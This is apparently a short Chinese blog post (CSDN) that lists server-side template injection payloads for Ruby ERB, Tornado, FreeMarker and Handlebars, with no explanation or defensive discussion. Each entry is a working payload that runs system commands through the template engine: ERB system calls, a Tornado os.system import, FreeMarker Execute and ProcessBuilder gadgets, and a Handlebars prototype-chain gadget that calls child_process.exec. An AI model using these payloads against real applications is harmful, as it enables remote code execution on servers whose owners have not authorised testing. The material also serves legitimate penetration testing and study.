SSTI模板注入

最新推荐文章于 2024-11-10 15:12:00 发布

weixin_48170459

最新推荐文章于 2024-11-10 15:12:00 发布

阅读量250

点赞数 1

文章标签：安全

本文链接：https://blog.csdn.net/weixin_48170459/article/details/124019247

版权

Ruby ERB模板注入
执行命令

exec 'echo "hello" '
system 'echo "hello" '

payload

<%=system 'echo "hello" '%>

tornado模板注入

Python代码执行

{%导入python 模块%}
{{python代码}}

比如：

{%import%20os%}{{os.system('ls')}}

FreeMarker模板注入

执行命令

<#assign value="freemarker.template.utility.Execute"?new()>${value("ls")}

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","ls").start()}
这个无回显

Handlebars 模板注入
命令执行
无回显

wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('cmd');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}